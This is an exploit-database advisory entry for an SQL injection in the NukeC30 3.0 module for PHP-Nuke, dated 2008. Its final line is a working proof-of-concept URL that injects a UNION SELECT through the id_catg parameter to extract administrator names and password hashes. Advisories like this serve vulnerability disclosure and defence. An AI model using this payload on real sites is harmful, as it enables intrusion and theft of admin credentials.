PHP-Nuke NukeC30 3.0 Module - id_catg SQL Injection

2008-03-11T00:00:00
ID EXPLOITPACK:C9C9ADA56D74CBFF6E388F87597C182F
Type exploitpack
Reporter Houssamix
Modified 2008-03-11T00:00:00

Description

PHP-Nuke NukeC30 3.0 Module - id_catg SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/28197/info

The NukeC30 module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The NukeC30 module 3.0 is affected; other versions may also be vulnerable. 

http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2